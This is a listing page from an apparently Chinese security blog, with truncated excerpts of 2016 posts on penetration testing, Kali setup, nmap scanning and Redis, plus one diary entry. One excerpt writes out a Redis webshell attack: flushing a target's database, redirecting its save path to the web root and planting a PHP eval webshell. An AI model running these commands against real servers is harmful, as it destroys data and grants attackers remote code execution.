渗透技巧——通过cmd上传文件的N种方法

渗透技巧——通过cmd上传文件的N种方法
0x00 前言 在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmd shell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。 0x02 测试环境 OS:Win7 x86 test exe:ssss2.exe,成功运行后输出1 0x03 通用上传方法 1、 debug debug是一个程序调试工具,功能包括: 直接输入,更改,跟踪,运行汇...
2016年04月14日 汪洋大海 暂无评论 喜欢 0 阅读 3,012 views 次 阅读全文

kali linux开启ssh登录 WinSCP登录kali linux方法

kali linux开启ssh登录 WinSCP登录kali linux方法
最新2019 kali linux 开启ssh登录的方法,超级简单。 1. kali linux ssh的配置 (1)打开/etc/ssh/sshd_config,我们需要配置它。 (2)找到#PasswordAuthentication yes,把注释符号#去掉。 (3)找到#PermitRootLogin without-password ,把前面的#去掉,并且将“without-password”修改为YES,现在就可以启动ssh了。 (4)如果想设置开机自动启动,可以执行以下命令: ...
2016年04月12日 学习笔记 暂无评论 喜欢 2 阅读 9,184 views 次 阅读全文

redis写webshell redis

redis写webshell redis
nmap --script=redis-info  -p6379 192.168.1.0/24 --open   redis写webshell 刷新并进入redis控制台 redis-cli -h 192.168.20.215 flushall exit redis-cli -h 192.168.20.215 修改默认目录和文件名(需要web的绝对路径) config set dir /var/www/html config set dbfilename index1.php set a2 "<?php @eval($_POST[cmd]);?>" save  ssh-...
2016年04月11日 学习笔记 暂无评论 喜欢 0 阅读 5,354 views 次 阅读全文

Redis 未授权访问配合 SSH key 文件利用分析

Redis 未授权访问配合 SSH key 文件利用分析
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis 未授权访问的问题是一直存在的问题,知道创宇安全研究团队历史上也做过相关的应急,今日,又出现 Redis 未授权访问配合 SSH key 文件被利用的情况,导致一大批 Redis 服务器被黑,今天我们来简要的分析下。 一、漏洞概述 Redis 默认情况下,会...
2016年04月11日 汪洋大海 暂无评论 喜欢 0 阅读 2,755 views 次 阅读全文

kali linux安装redis 及使用客户端命令 redis-cli -h

kali linux安装redis 及使用客户端命令 redis-cli -h
本文主要是为了利用kali linux2.0 测试redis未授权访问。并非非常非常详细讲redis如何安装及设置。 首先,你需要下载最新的redis,例如我下载的就是稳定版,非最新版。地址:http://download.redis.io/releases/redis-3.0.7.tar.gz 然后你随意解压到哪个目录,然后在那个目录打开终端。直接输入命令:make 安装。安装完后,你需要进入SRC文件夹,然后输入下面的命令:cp red...
2016年04月11日 学习笔记 暂无评论 喜欢 2 阅读 9,565 views 次 阅读全文

php多线程采集_PHP CURL 多线程 GET/POST 类

php多线程采集_PHP CURL 多线程 GET/POST 类
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 <?php /**************************************************************** PHP CURL 多线程 GET/POST curl(array('url?get=data','url'),array('','post_data')); *****************************************************************/ function curl($u...
2016年04月11日 汪洋大海 暂无评论 喜欢 0 阅读 3,503 views 次 阅读全文

树莓派3b 安装kali linux 如何配置

树莓派3b 安装kali linux 如何配置
首先下载:下载地址: http://images.kali.org/kali-2.0.1-rpi2.img.xz   针对树莓派最好的扩展工具是raspi-config,在kali1的源中也是存在的,但在2.0版本中则被移除了,只好手动安装。 首先从http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/下载最新的raspi-config,然后解决依赖: apt-get install triggerhappy lua5.1 alsa-utils dpkg -i ra...
2016年04月08日 汪洋大海 暂无评论 喜欢 1 阅读 3,079 views 次 阅读全文

nmap 扫描输出格式 IP:端口 txt

nmap 扫描输出格式 IP:端口 txt
nmap -vv -p 80,873,1433,1521,3306,2601,6379,7001,7002,7071,8000,8001,8002,8069,8080,8081,8888,9200,9300,9043,9080,11211,27017 127.0.0.1/24 | grep "Discovered open port" | awk {'print $6":"$4'} | awk -F/ {'print $1'} > output.txt   nmap -vv -iL yuming.txt /24  | grep "Discovered open port" | awk {'print $6":"$4'} | awk -F/ {'print $1'} &g...
2016年04月06日 学习笔记 暂无评论 喜欢 0 阅读 14,566 views 次 阅读全文

问问自己对社会到底有多冷漠!

问问自己对社会到底有多冷漠!
今天看到一篇新闻,感触颇深,新闻名字是[21岁女孩找“微信好友”注射玻尿酸隆鼻 右眼竟失明],一个非常年轻漂亮的女孩一只眼睛失明,,原因居然是因为完全相信微商!!! 不知道为什么看到这篇文章的我居然一点不会为这个女生感觉到惋惜,突然有些感觉自己怎么这样冷漠?自己从新审核了一下自己,发现自己好像真的变得非常的冷漠,对很多事情都是如此,就像看见要饭的,我并...
2016年04月02日 个人日记 暂无评论 喜欢 2 阅读 3,230 views 次 阅读全文

虚拟机 kali linux – 桥接、NAT、仅主机都上不了网解决方法

虚拟机 kali linux – 桥接、NAT、仅主机都上不了网解决方法
唉,无奈自己是个小白,电脑安装完最新版本的java之后,发现虚拟机里面的kali linux 2.0就无法上网了,始终就没弄明白到底怎么弄的呢?!安装一个JAVA跟虚拟机有毛毛关系喂猫就上不了网了?! 最后本人删除虚拟机,从新做系统,也白费!!!最后本人给出如下答案。 首先看如,设置: 设置虚拟机联网方式 然后进入kali linux2.0系统里面的网络设置,看图: kali linux2.0网络...
2016年04月01日 学习笔记 暂无评论 喜欢 0 阅读 9,720 views 次 阅读全文